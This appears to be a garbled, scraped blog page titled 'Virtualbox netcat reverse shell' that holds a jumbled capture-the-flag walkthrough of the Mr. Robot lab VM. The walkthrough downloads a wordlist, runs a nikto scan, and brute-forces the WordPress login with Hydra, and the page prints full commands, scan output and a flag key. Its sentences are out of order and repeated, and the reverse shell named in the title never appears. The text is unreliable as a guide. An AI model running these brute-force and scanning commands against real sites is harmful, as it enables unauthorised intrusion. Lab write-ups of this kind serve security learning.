kclasas.blogg.se - Virtualbox netcat reverse shell

#Virtualbox netcat reverse shell license

WPScan is also an inbuilt tool of Kali Linux for cracking passwords.

For that we will use WPScan for finding.

max 16 tasks per 1 server, overall 16 tasks, 11452 login tries (l:11452/p:1), ~716 tries per task attacking http-post-form://192.168.1.4:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. As target has already allowed login hydra -V -L wordlist.dic -p 123 192.168.1.4 http-post-form '/news.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

Hydra will return with http-post-form.

-L is used for Login name, we are using wordlist we created above.

Type hydra -V -L wordlist.dic -p 123 192.168.1.4 http-post-form ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username’.

We will use hydra which is inbuilt in Kali Linux. wordpresswp-login.php: WordPress login foundħ915 requests: 0 error(s) and 18 item(s) reported on remote host blog/wp-login.php: WordPress login found wordpresswp-admin/wp-login.php: WordPress login found wp-admin/wp-login.php: WordPress login found wordpress: A WordPress installation was found. wp-login/: Admin login page/section found. admin/index.html: Admin login page/section found.Ĭookie wordpress_test_cookie created without the httponly flag

#Virtualbox netcat reverse shell license

OSVDB-3092: /license.txt: License file found may identify site software. wp-links-opml.php: This WordPress script reveals the installed version. Uncommon header 'link' found, with contents: rel=shortlink OSVDB-3092: /admin/: This might be interesting… The following alternatives for 'index' were found: index.html, index.php Uncommon header 'tcn' found, with contents: listĪpache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. No CGI Directories found (use '-C all' to force check all possible dirs) Retrieved x-powered-by header: PHP/5.5.29

This could allow the user agent to render the content of the site in a different fashion to the MIME type The X-Content-Type-Options header is not set. This header can hint to the user agent to protect against some forms of XSS The X-XSS-Protection header is not defined. Type cat fsocity.dic | sort -u | uniq > wordlist.dic for creating cat fsocity.dic | sort -u | uniq > wordlist.dic Now we will use nikto, Type nikto -h 192.168.1.4 for finding allowed webpages.According to Ethical hacking researcher of International Institute of Cyber Security, getting key is easy if you are clear on the cat key-1-of-3.txt 073403c8a58a1f80d943455fb30724b9.HTTP request sent, awaiting response… 200 OKįsocity.dic 100% 6.91M 35.8MB/s in 0.2s And then type wget wget 192.168.1.4/fsocity.dic.On Kali, Open terminal type wget 192.168.1.4/fsocity.dic.